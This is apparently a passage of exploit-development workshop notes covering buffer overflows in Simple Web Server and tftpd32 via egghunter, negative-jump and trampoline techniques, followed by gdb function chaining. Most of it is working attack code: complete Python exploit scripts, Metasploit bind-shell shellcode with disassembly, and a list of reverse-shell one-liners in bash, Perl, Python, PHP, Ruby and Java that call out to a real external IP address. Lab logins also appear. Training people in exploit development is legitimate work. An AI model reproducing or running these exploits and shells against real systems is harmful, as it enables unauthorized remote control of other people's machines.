nc XPSP3-ED-Target-IP 4444
1991
-----------------------------------------------------------------------
1992
 
1993
 
1994
########################################
1995
# Lab 2a: Not Enough Space (Egghunter) #
1996
########################################
1997
1998
-----------------------------------------------------------------------
1999
 
2000
SWS - SIMPLE WEB SERVER
2001
-----------------------
2002
 
2003
Running SWS on Strategicsec-XP-ED-Target-VM
2004
Start > Programs > Simple Web Server (it's in the middle somewhere)
2005
Red icon in system tray
2006
Double click it
2007
- it will pop up a menu
2008
- select "start"
2009
- dialog box shows starting params - port 82
2010
 
2011
WinDBG
2012
- attach to "server.exe"
2013
 
2014
---------------------------Type This-----------------------------------
2015
 
2016
c:\python27\python.exe  sws1.py XPSP3-ED-Target-IP
2017
 
2018
    0:003> dd eip
2019
    0:003> dd esp 
2020
 
2021
c:\python27\python.exe  sws2.py XPSP3-ED-Target-IP
2022
  
2023
    0:003> dd eip
2024
    0:003> dd esp
2025
 
2026
SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
2027
cd /home/strategicsec/toolz/metasploit/tools
2028
ruby pattern_offset.rb 41356841             <------- You should see that EIP is at 225
2029
ruby pattern_offset.rb 68413668             <------- You should see that ESP is at 229
2030
 
2031
-----------------------------------------------------------------------
2032
 
2033
 
2034
 
2035
 
2036
 
2037
 
2038
 
2039
EGGHUNTER:
2040
----------
2041
 
2042
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
2043
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
2044
          ^^^^^^^^^^^^^^^^
2045
               ABBA
2046
                                         JMP ESP
2047
                                        /
2048
                                       /
2049
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
2050
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
2051
 
2052
 
2053
 
2054
 
2055
-----sws3.py-----
2056
#!/usr/bin/python2
2057
import os
2058
import sys
2059
import socket
2060
import struct # for pack function
2061
2062
if len(sys.argv) < 2:
2063
	sys.stderr.write("Usage: sws3.py <host>\n")
2064
	sys.exit(1)
2065
2066
2067
target = sys.argv[1]
2068
port = 82
2069
 
2070
 
2071
pad = "A" * 225        # distance to EIP
2072
eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll
2073
 
2074
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
2075
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
2076
 
2077
shellcode = "\xCC" * 700
2078
 
2079
buf = "GET /"
2080
buf += pad + struct.pack('<I', eip) + egghunter
2081
buf += " HTTP/1.0\r\n"
2082
buf += "User-Agent: ABBAABBA"
2083
buf += shellcode
2084
buf += " HTTP/1.0\r\n"
2085
 
2086
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # for TCP
2087
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for UDP
2088
2089
try:
2090
	s.connect((target, port))
2091
	s.sendall(buf)
2092
except Exception as e:
2093
	sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
2094
finally:
2095
	s.close()
2096
	sys.stderr.write("Sent.\n")
2097
-----
2098
 
2099
############################################
2100
# Lab 2b: Not Enough Space (Negative Jump) #
2101
############################################
2102
 
2103
2104
 
2105
-----------------------------------------------------------------------
2106
 
2107
[pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
2108
 
2109
                                    ^
2110
1 ----------------------1 overflow the buffer---------------------------|
2111
                                   
2112
                                    ^                    ^
2113
                                    |
2114
                                    2 ----jump over seh record---|
2115
 
2116
                                                     ^              ^  
2117
                                                     |
2118
                                                     3--POP 2 words off stack---|
2119
 
2120
                                                                    ^                  
2121
4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
2122
 
2123
 
2124
#########################################
2125
# Lab 2c: Not Enough Space (Trampoline) #
2126
#########################################
2127
 
2128
---------------------------Type This-----------------------------------
2129
 
2130
cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
2131
-----------------------------------------------------------------------
2132
 
2133
 
2134
On the Strategicsec-XP-ED-Target-VM VM
2135
 
2136
- open a command prompt
2137
- c:\software\tftpd32
2138
- run tftpd32.exe
2139
- UDP port 69
2140
(socket code is already in the scripts)
2141
 
2142
 
2143
 
2144
 
2145
On your attack host please install:
2146
 
2147
 
2148
  NASM - Netwide Assembler
2149
 
2150
 
2151
 
2152
 
2153
 
2154
-----------------------------------------------------------------------------------------------------------------
2155
 
2156
 
2157
We want to generate the shellcode (BIND SHELL on Port 4444)
2158
- No restricted characters
2159
- Encoder: NONE
2160
 
2161
Create a Python file called dumpshellcode.py
2162
 
2163
---
2164
#!/usr/bin/python2
2165
 
2166
import os
2167
import sys
2168
import struct
2169
 
2170
 
2171
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
2172
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
2173
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
2174
shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
2175
shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
2176
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
2177
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
2178
shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
2179
shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
2180
shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
2181
shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
2182
shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
2183
shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
2184
shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
2185
shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
2186
shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
2187
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
2188
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
2189
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
2190
shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
2191
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
2192
 
2193
sys.stdout.write(shellcode)
2194
---
2195
 
2196
 
2197
 
2198
python dumpshell.py > bindshell.bin
2199
 
2200
copy bindshellcode.bin into the "c:\Program Files\nasm" directory
2201
 
2202
 
2203
 
2204
Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
2205
317 bindshell.bin
2206
 
2207
---------------------------Type This-----------------------------------
2208
 
2209
C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
2210
-----------------------------------------------------------------------
2211
 
2212
00000000  FC                cld
2213
00000001  6AEB              push byte -0x15
2214
00000003  4D                dec ebp
2215
00000004  E8F9FFFFFF        call dword 0x2
2216
00000009  60                pushad
2217
0000000A  8B6C2424          mov ebp,[esp+0x24]
2218
0000000E  8B453C            mov eax,[ebp+0x3c]
2219
00000011  8B7C0578          mov edi,[ebp+eax+0x78]
2220
00000015  01EF              add edi,ebp
2221
00000017  8B4F18            mov ecx,[edi+0x18]
2222
0000001A  8B5F20            mov ebx,[edi+0x20]
2223
0000001D  01EB              add ebx,ebp
2224
0000001F  49                dec ecx
2225
00000020  8B348B            mov esi,[ebx+ecx*4]
2226
00000023  01EE              add esi,ebp
2227
00000025  31C0              xor eax,eax
2228
00000027  99                cdq
2229
00000028  AC                lodsb
2230
00000029  84C0              test al,al
2231
0000002B  7407              jz 0x34
2232
0000002D  C1CA0D            ror edx,0xd
2233
00000030  01C2              add edx,eax
2234
00000032  EBF4              jmp short 0x28
2235
00000034  3B542428          cmp edx,[esp+0x28]
2236
00000038  75E5              jnz 0x1f
2237
0000003A  8B5F24            mov ebx,[edi+0x24]
2238
0000003D  01EB              add ebx,ebp
2239
0000003F  668B0C4B          mov cx,[ebx+ecx*2]
2240
00000043  8B5F1C            mov ebx,[edi+0x1c]
2241
00000046  01EB              add ebx,ebp
2242
00000048  032C8B            add ebp,[ebx+ecx*4]
2243
0000004B  896C241C          mov [esp+0x1c],ebp
2244
0000004F  61                popad
2245
00000050  C3                ret
2246
00000051  31DB              xor ebx,ebx
2247
00000053  648B4330          mov eax,[fs:ebx+0x30]
2248
00000057  8B400C            mov eax,[eax+0xc]
2249
0000005A  8B701C            mov esi,[eax+0x1c]
2250
0000005D  AD                lodsd
2251
0000005E  8B4008            mov eax,[eax+0x8]
2252
00000061  5E                pop esi
2253
00000062  688E4E0EEC        push dword 0xec0e4e8e
2254
00000067  50                push eax
2255
00000068  FFD6              call esi
2256
0000006A  6653              push bx
2257
0000006C  66683332          push word 0x3233
2258
00000070  687773325F        push dword 0x5f327377
2259
00000075  54                push esp
2260
00000076  FFD0              call eax
2261
00000078  68CBEDFC3B        push dword 0x3bfcedcb
2262
0000007D  50                push eax
2263
0000007E  FFD6              call esi                     PART 1
2264
00000080  5F                pop edi
2265
00000081  89E5              mov ebp,esp
2266
00000083  6681ED0802        sub bp,0x208
2267
00000088  55                push ebp
2268
00000089  6A02              push byte +0x2
2269
0000008B  FFD0              call eax
2270
0000008D  68D909F5AD        push dword 0xadf509d9
2271
00000092  57                push edi
2272
00000093  FFD6              call esi
2273
00000095  53                push ebx
2274
00000096  53                push ebx
2275
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
2276
00000097  53                push ebx
2277
00000098  53                push ebx
2278
00000099  53                push ebx
2279
0000009A  43                inc ebx
2280
0000009B  53                push ebx
2281
0000009C  43                inc ebx
2282
0000009D  53                push ebx                       PART 2
2283
0000009E  FFD0              call eax
2284
000000A0  6668115C          push word 0x5c11
2285
000000A4  6653              push bx
2286
000000A6  89E1              mov ecx,esp
2287
000000A8  95                xchg eax,ebp
2288
000000A9  68A41A70C7        push dword 0xc7701aa4
2289
000000AE  57                push edi
2290
000000AF  FFD6              call esi
2291
000000B1  6A10              push byte +0x10
2292
000000B3  51                push ecx
2293
000000B4  55                push ebp
2294
000000B5  FFD0              call eax
2295
000000B7  68A4AD2EE9        push dword 0xe92eada4
2296
000000BC  57                push edi
2297
000000BD  FFD6              call esi
2298
000000BF  53                push ebx
2299
000000C0  55                push ebp
2300
000000C1  FFD0              call eax
2301
000000C3  68E5498649        push dword 0x498649e5
2302
000000C8  57                push edi
2303
000000C9  FFD6              call esi
2304
000000CB  50                push eax
2305
000000CC  54                push esp
2306
000000CD  54                push esp
2307
000000CE  55                push ebp
2308
000000CF  FFD0              call eax
2309
000000D1  93                xchg eax,ebx
2310
000000D2  68E779C679        push dword 0x79c679e7
2311
000000D7  57                push edi
2312
000000D8  FFD6              call esi
2313
000000DA  55                push ebp
2314
000000DB  FFD0              call eax
2315
000000DD  666A64            push word 0x64
2316
000000E0  6668636D          push word 0x6d63
2317
000000E4  89E5              mov ebp,esp
2318
000000E6  6A50              push byte +0x50
2319
000000E8  59                pop ecx
2320
000000E9  29CC              sub esp,ecx
2321
000000EB  89E7              mov edi,esp
2322
000000ED  6A44              push byte +0x44
2323
000000EF  89E2              mov edx,esp
2324
000000F1  31C0              xor eax,eax
2325
000000F3  F3AA              rep stosb
2326
000000F5  FE422D            inc byte [edx+0x2d]
2327
000000F8  FE422C            inc byte [edx+0x2c]
2328
000000FB  93                xchg eax,ebx
2329
000000FC  8D7A38            lea edi,[edx+0x38]
2330
000000FF  AB                stosd
2331
00000100  AB                stosd
2332
00000101  AB                stosd
2333
00000102  6872FEB316        push dword 0x16b3fe72
2334
00000107  FF7544            push dword [ebp+0x44]
2335
0000010A  FFD6              call esi
2336
0000010C  5B                pop ebx
2337
0000010D  57                push edi
2338
0000010E  52                push edx
2339
0000010F  51                push ecx
2340
00000110  51                push ecx
2341
00000111  51                push ecx
2342
00000112  6A01              push byte +0x1
2343
00000114  51                push ecx
2344
00000115  51                push ecx
2345
00000116  55                push ebp
2346
00000117  51                push ecx
2347
00000118  FFD0              call eax
2348
0000011A  68ADD905CE        push dword 0xce05d9ad
2349
0000011F  53                push ebx
2350
00000120  FFD6              call esi
2351
00000122  6AFF              push byte -0x1
2352
00000124  FF37              push dword [edi]
2353
00000126  FFD0              call eax
2354
00000128  8B57FC            mov edx,[edi-0x4]
2355
0000012B  83C464            add esp,byte +0x64
2356
0000012E  FFD6              call esi
2357
00000130  52                push edx
2358
00000131  FFD0              call eax
2359
00000133  68F08A045F        push dword 0x5f048af0
2360
00000138  53                push ebx
2361
00000139  FFD6              call esi
2362
0000013B  FFD0              call eax
2363
 
2364
-------------------------------------------------------------------------------------------
2365
Another option would be to go to a website like:
2366
http://shell-storm.org/online/Online-Assembler-and-Disassembler/
2367
2368
Choose the bottom box and paste the code below into it. Select x86 (32), and make sure that little endian is checked. Then click "Disassemble"
2369
2370
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
2371
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
2372
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
2373
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
2374
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
2375
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
2376
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
2377
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
2378
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
2379
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
2380
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
2381
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
2382
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
2383
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
2384
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
2385
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
2386
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
2387
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
2388
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
2389
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
2390
2391
2392
 
2393
 
2394
part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
2395
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
2396
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
2397
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
2398
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
2399
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
2400
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
2401
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
2402
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
2403
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
2404
 
2405
 
2406
part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
2407
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
2408
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
2409
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
2410
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
2411
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
2412
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
2413
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
2414
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
2415
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
2416
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
2417
 
2418
 
2419
STACK SHIFTER:
2420
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h
2421
prepend += "\x44"                     # inc esp
2422
 
2423
 
2424
 
2425
 
2426
 
2427
 
2428
 
2429
 
2430
 
2431
 
2432
 
2433
 
2434
 
2435
 
2436
---- final script ----
2437
 
2438
#!/usr/bin/python2
2439
#TFTP Server remote Buffer Overflow
2440
 
2441
import sys
2442
import socket
2443
import struct
2444
 
2445
if len(sys.argv) < 2:
2446
    sys.stderr.write("Usage: tftpd.py <host>\n")
2447
    sys.exit(1)
2448
 
2449
target = sys.argv[1]
2450
port = 69
2451
 
2452
eip = 0x7e429353         # jmp esp in USER32.DLL
2453
 
2454
part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
2455
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
2456
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
2457
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
2458
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
2459
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
2460
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
2461
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
2462
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
2463
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
2464
 
2465
part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
2466
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
2467
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
2468
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
2469
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
2470
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
2471
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
2472
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
2473
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
2474
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
2475
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
2476
 
2477
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"            # add esp, -1001h
2478
prepend += "\x44"                               # inc esp
2479
 
2480
buf = "\x00\x01"                        # receive command
2481
 
2482
buf += "\x90" * (256 - len(part2))              # NOPs
2483
buf += part2                                    # shellcode part 2
2484
buf += struct.pack('<I', eip)                           # EIP (JMP ESP)
2485
buf += prepend                                      # stack shifter
2486
buf += part1                                        # shellcode part 1
2487
buf += "\xE9" + struct.pack('<i', -380)             # JMP -380
2488
buf += "\x00"                                       # END
2489
 
2490
# print buf
2491
 
2492
# buf = "\x00\x01"                      # receive command
2493
 
2494
# buf += "A" * 300 + "\x00"
2495
 
2496
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
2497
 
2498
try:
2499
    sock.connect((target, port))
2500
    sock.sendall(buf)
2501
except Exception as e:
2502
    sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
2503
finally:
2504
    sock.close()
2505
    sys.stderr.write("Sent.\n")
2506
 
2507
 
2508
 
2509
-----------------------------------------------------------------------------------------------------------------
2510
 
2511
 
2512
 
2513
 
2514
How does all of this actually work
2515
 
2516
 
2517
 
2518
 
2519
Total shellcode length:     315
2520
   
2521
                Part1:  150
2522
                Part2:  165
2523
 
2524
 
2525
NOPS * (256 - 165)
2526
 
2527
91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
2528
            |           |                   |
2529
            256         260                 150 (410)       |
2530
  |<------------------------------------------------------------------------------------------------------------|                                                                              
2531
 Jump to the
2532
 30 byte mark
2533
2534
2535
2536
2537
2538
=================================================================================
2539
2540
2541
############################## 
2542
# Intro to function chaining #
2543
##############################
2544
ssh into 192.168.1.117
2545
username: exploitlab
2546
password: exploitlab
2547
2548
2549
---------------------------Type This-----------------------------------
2550
cd /home/exploitlab
2551
cat victim2.c
2552
make victim2
2553
./victim2 AAAAAAAAAAAAA
2554
-----------------------------------------------------------------------
2555
2556
2557
2558
---------------------------Type This-----------------------------------
2559
gdb victim2
2560
disassemble main
2561
2562
break *0x080483cb
2563
2564
run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2565
-----------------------------------------------------------------------
2566
2567
2568
---------------------------Type This-----------------------------------
2569
bt
2570
x/i $eip
2571
x/64x $esp
2572
2573
2574
quit
2575
-----------------------------------------------------------------------
2576
2577
2578
2579
2580
---------------------------Type This-----------------------------------
2581
cat frame1.pl
2582
export EGG=`./frame1.pl`
2583
gdb victim2
2584
(gdb) run $EGG
2585
-----------------------------------------------------------------------
2586
2587
2588
2589
2590
2591
x/100i 0x80484a5		(looking for a pop/pop/ret)
2592
quit
2593
cat frame2.pl
2594
export EGG=`./frame2.pl`
2595
gdb victim2
2596
run $EGG
2597
2598
2599
stepi
2600
2601
2602
-------------------------------------------------------------------------------------------------------
2603
2604
2605
2606
2607
2608
2609
2610
2611
Lots of reverse shells in different languages
2612
---------------------------------------------------------------------
2613
 
2614
 
2615
 
2616
########
2617
# Bash #
2618
########
2619
 
2620
---------------------------Type This-----------------------------------
2621
2622
bash -i >& /dev/tcp/45.32.211.184/8080 0>&1
2623
2624
 
2625
----------------------------------------------------------------------
2626
2627
****** Note /dev/tcp is usually in Red Hat derivatives and NOT Debian derivatives you want to try /proc/net/tcp instead ***
2628
 
2629
 
2630
########
2631
# Perl #
2632
########
2633
 
2634
---------------------------Type This-----------------------------------
2635
 
2636
 
2637
perl -e 'use Socket;$i="45.32.211.184";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2638
 
2639
----------------------------------------------------------------------
2640
2641
 
2642
2643
2644
2645
---------------------------------------------------------------------- 
2646
cat perlbackdoor.pl
2647
#!/usr/bin/perl
2648
use Socket;
2649
use FileHandle;
2650
$IP = $ARGV[0];
2651
$PORT = $ARGV[1];
2652
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
2653
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
2654
SOCKET->autoflush();
2655
open(STDIN, ">&SOCKET");
2656
open(STDOUT,">&SOCKET");
2657
open(STDERR,">&SOCKET");
2658
system("/bin/sh -i");
2659
 
2660
----------------------------------------------------------------------
2661
 
2662
##########
2663
# Python #
2664
##########
2665
 
2666
---------------------------Type This-----------------------------------
2667
 
2668
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.32.211.184",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2669
 
2670
----------------------------------------------------------------------
2671
 
2672
2673
2674
#######
2675
# Php #
2676
#######
2677
---------------------------Type This-----------------------------------
2678
 
2679
php -r '$sock=fsockopen("45.32.211.184",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
2680
 
2681
----------------------------------------------------------------------
2682
 
2683
2684
2685
########
2686
# ruby #
2687
########
2688
---------------------------Type This-----------------------------------
2689
 
2690
ruby -rsocket -e'f=TCPSocket.open("45.32.211.184",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
2691
 
2692
----------------------------------------------------------------------
2693
 
2694
 
2695
########
2696
# Java #
2697
########
2698
---------------------------Type This-----------------------------------
2699
 
2700
r = Runtime.getRuntime()
2701
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/45.32.211.184/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
2702
p.waitFor()
2703
 
2704
 
2705
exec 5<>/dev/tcp/45.32.211.184/1234
2706
 
2707
 
2708
cat <&5 | while read line; do $line 2>&5 >&5; done
2709
 
2710
exec 5<>/dev/tcp/45.32.211.184/1234
2711
 
2712
while read line 0<&5; do $line 2>&5 >&5; done
2713
0<&196;exec 196<>/dev/tcp/45.32.211.184/1234; sh <&196 >&196 2>&196
2714
 
2715
----------------------------------------------------------------------
2716
****** Note /dev/tcp is usually in Red Hat derivatives and NOT Debian derivatives you want to try /proc/net/tcp instead ***
2717
2718
2719
2720
2721
2722
2723
2724
 
2725
##############
2726
# Powershell #
2727
##############
2728
---------------------------Type This-----------------------------------
2729
 
2730
